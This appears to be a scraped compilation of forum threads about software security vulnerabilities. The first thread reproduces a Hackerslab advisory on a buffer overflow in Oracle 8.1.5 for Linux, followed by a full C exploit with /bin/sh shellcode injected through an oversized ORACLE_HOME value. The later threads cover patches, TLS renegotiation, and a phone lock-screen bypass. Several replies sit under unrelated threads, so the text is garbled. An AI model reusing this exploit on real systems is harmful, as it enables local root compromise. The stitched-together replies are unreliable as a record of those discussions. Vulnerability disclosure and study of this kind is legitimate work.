CVE-2000-0649 Security Vulnerability

Similar Messages

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• Lenovo software and driver security vulnerability fixes

  I have noticed there are security vulnerability fixes (among other fixes) in several Lenovo software and driver updates.
  Synaptics ThinkPad UltraNav Driver (2013/04/25, version 16.2.19.7)
  http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/6hgx75ww.txt
  <16.2.19.7>
  - (Fix) Fixed security vulnerability issues.
  Hotkey Features Integration (2013/04/25, version 3.84.5000)
  http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/8jvu35ww.txt
  <3.84.5000>
   - (Fix) Fixed security vulnerability issues in service registration path and function calls inside the program binary.
  Power Manager (2013/04/26, version 6.54)
  http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/hfu406ww.txt
  <6.46>
  - (Fix) Fixed a vulnerability security issue.
  ThinkVantage Access Connections (2013/04/08, vesion 6.01)
  http://download.lenovo.com/pccbbs/mobiles/ggc709ww.txt
  <5.97>
   - (Fix) Fix for security vulnerabilities privately and responsibly disclosed by Frederic BOURLA of High-Tech Bridge SA

  There are several reports of fixed vulnerabilities in Lenovo software and drivers that I have summarized here
  Unfortunately there are no detailed descriptions of these security issues. Currently there are databases like CVE MITRE that collects such reports for any software. Could Lenovo be more specific about these vulnerabilities and add CVE references ?
  Moderator Note; Threads merged; link to this thread removed

• RV016 - TLS Protocol Session Renegotiation Security Vulnerability

  My RV016 with firmware 3.0.2.01-tm has failed PCI compliancy testing with my credit card company. They have identified that a TLS Protocol Session Renegotiation Security Vulnerability exists. I see that I have the most recent firmware version for my router and have disabled PPTP server, but I cannot get it to pass. How do I disable this feature?
  Steve

  I found the vulnerability number CVE-2009-3555
  If u have applied the latest Critical Patch Update, you should b fine.
  Find more details here
  http://www.oracle.com/technology/deploy/security/critical-patch-updates/javacpumar2010.html
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555

• Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

  Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
  I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

  No fix is needed since that vulnarability isn't in 4.2.1.

• We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  You can file a bug report to do that request.
  http://developer.mozilla.org/en/docs/Bug_writing_guidelines

• JComboBox makes for nice security vulnerability under X11?

  I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
  When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
  Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

  Hi
  Try going here:
  http://europe.nokia.com/A4423034
  Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
  Cheers

• HT202802 What "security vulnerability" will be opened by using this signing technique?

  Regarding article: HT202802
  OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
  The article says:
  Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
  1. What "security vulnerability" will be opened by using this signing technique?
  2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
  3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
  "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
  1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
  Thanks for the help in advance!

  1) There are a few system features, including accessibility, that will override any and all other security protections on you machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
  2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
  3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
  Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.

• Mac Java security vulnerability upgrade - issue.

  The recent (I did it today) upgrade of Mac OS 10.8.2 to fix Java security vulnerability is now causing flickering on my Macbook Pro. Kindly help.

  Restart.
  Reset PRAM.  http://support.apple.com/kb/PH4405
  Best.

• FTP security vulnerability or what ?

  I have tested the FTP settings on my DL2100 and allowed access for only 2 users X and Y. I have disabled Anonymous user on the FTP folder.When i looked at my logs, i saw that Anonymous has been logging in and out a few times a day.  I said that impossbile since this user is  not allowed.I logged on to the FTP with Anonymous myself, to my surprise and see only the ROOT folder, but indeed no FTP shares. I couldn't navigate anywhere with this user, BUT is this the way WD intended to secure FTP connections ? Shouldn't  the connection for Anonymous be denied from the beggining ?

  adicrst wrote:
  Reply from WD Support Thank you for contacting Western Digital Customer Service and Support. My name is X.
  I am sorry to read that you have an issue with the FTP. Our apologies for the inconvenience that this may have caused you.
  Concerning the question you have about the Anonymous in FTP, I can inform you that when you created shares w which are accessible through FTP and you selected for the Anonymous as None, it is counted always for the share which Anonymous is not allowed to access and not for the root directory. That is why you can see the root directory, but not the specific shares.
  I hope that I provided you the information you need and that you are satisfied with the answer.
  If you have any further questions, please reply to this email and we will be happy to assist you further. So in other words we should just live with this security vulnerability, even if everyone has a solid confirmation that your FTP is available on the internet and everyone can log just for the fun of it with Anonymous user.What if i allow only 1 FTP connection and a hacker is holding it busy with  Anonymous session ? Like the support guy state, when you enable FTP on a folder, remember to select, when I state select mean click the down arrow and select "Anonymous None" then click save.  That is how I know it will save the setting.  If you don't select, the device will think you want to set your FTP server for everyone to log in "including annonymous."

• Upgrade to GnuTLS 3.2.12 to Avoid Security Vulnerability

  Per ArsTechnica, RedHat discovered a security vulnerability in GnuTLS and published an alert on March 3. Thanks to andyrtr, the safe version (3.2.12-1) was pushed into extra on March 3 (i.e., same day).
  You might consider updating GnuTLS.
  Further details
  http://arstechnica.com/security/2014/03 … sdropping/
  Last edited by snakeroot (2014-03-04 23:53:21)

  nourathar wrote:
  nomorewindows wrote:pacman -Qi gnutls would give this for installed applications that use it.
  Hi nomorewindows,
  $ pacman -Qi gnutls
  Name : gnutls
  Version : 3.2.12-1
  Description : A library which provides a secure layer over a reliable transport layer
  Architecture : x86_64
  URL : http://www.gnutls.org/
  Licenses : GPL3 LGPL2.1
  Groups : None
  Provides : None
  Depends On : gcc-libs libtasn1 readline zlib nettle p11-kit
  Optional Deps : None
  Required By : ffmpeg filezilla glib-networking gnome-vfs gst-plugins-bad libimobiledevice smbclient
  Optional For : None
  Conflicts With : None
  Replaces : None
  Installed Size : 4703.00 KiB
  Packager : Andreas Radke <[email protected]>
  Build Date : Mon 03 Mar 2014 04:09:47 PM CET
  Install Date : Tue 04 Mar 2014 11:24:30 PM CET
  Install Reason : Installed as a dependency for another package
  Install Script : Yes
  Validated By : Signature
  the output is very different though and in my case  it lists only 7 packages.
  It makes me really wonder what 'whoneeds' actually does ?
  I suppose 'whoneeds' lists all the packages I have installed that require one of these 7 and so recursively on ?
  ciao,
  J.
  Notice it said 49 of his 495 packages.  And also notice that the same ones listed in your output are also in his output above.

• WRT1900AC - Open Port - 52147 - Security Vulnerability?

  I recently noticed in the router logs incoming connections on port 52147. I have confirmed that this port on the router is open (not closed or stealthed), by using the port scan tool at www.grc.com.  See port scan screenshot below.
  This situation is present with no devices connected to my internal network. My router is on the current firmware (1.1.8.164461).
  Anyone have an idea what is going on?
  Jeff
  Incoming log
  Source IP address | Destination port number
  110.93.76.194          52147 
  73.52.28.251            52147

  Yes, I did setup a Smart Wifi account during initial setup.
  It there any documentation where I can confirm that the port is open for Smart Wifi services, and should I be concerned about the inbound connections listed in the log (See above)?
  I am seeing a few more random IP addresses associated with that port in the log each day or so, and I would think that if it was due to legitimate Smart Wifi services activity, the traffic would be from a specific (and documented) address for Linksys servers.
  UPDATE: I just checked the log again, and there are a dozen or so random IP addesses in the Incoming Log associated with port 52147. Who-Is lookups place these addresses all around the world. Until this is explained to my satisfaction, I am leaving my devices disconnected from this router, and treating this as a security vulnerability.
  If anyone has any information or insight into this, it would be greatly appreciated.

• CVE-2009-3555 Renegotiation Vulnerability

  Good day!
  Recently, during a PCI vulnerability scan, it was brought to my attention that our SAP J2EE web server, for our B2B site, was reporting the CVE-2009-3555 Renegotiation Vulnerability.  Is there a SAP patch to correct this?  If not, how can we find resolution? 
  Thank you for your help!!

  Hi,
  I remember an OSS note for new version of SAP crypto library which disabled renegotiation. This was the first temporary solution which does not work for systems which require renegotiation. There should be similar fix thing for Java stack. Just search on service.sap.com/notes.
  Cheers

• Asha 501 Security Vulnerability

  Where can i report a Security Vulnerability in nokia asha 501...??Its Vulnerability bypasses lock code to access call logs as well as make calls. even if its locked wih security code.

  I think that's a feature rather than a bug.
  To reproduce you just set up a lock code for when you lock the screen, then type any number on the unlock screen, press the SOS button, then the green phone button and you're sent to the recent calls log.
  One thing that a locked out user shouldn't be able to do is set or unset a contact as favourite imo. You can do this by tapping any entry on the call log, then tapping the name of the contact that appears at the top and then the star at the right. You shouldn't be able to see more info about the contact other than the number and the call info when the phone is locked up (that is, nothing should happen the first time you tap on the contact's name).

• Major security vulnerability in some Samsung phones could trigger factory reset via web page

  This is a post that I read that has been verified on a number of news reports, spoke to Samsung and they reported that they are addressing this issue and a fix will be coming shortly but until then it is wise for all Samsung users be educated to avoid any issues with the device...
  Read post at
  http://www.androidcentral.com/major-security-vulnerability-samsung-phones-could-trigger-factory-reset-web-browser
  I JUST TESTED AND VERIFIED THAT IF YOU USE CHROME BROWSER ON ALL ICS DEVICES SHOULD HELP, IT WONT ALLOW CODE TO BE TRIGGERED UNLIKE THE STOCK BROWSER WILL...   
  Correct Chrome doesn't block all the time but replacing the dialer with a 3rd party dialer does...

  I plead the Fifth Wildman and it's all Good b33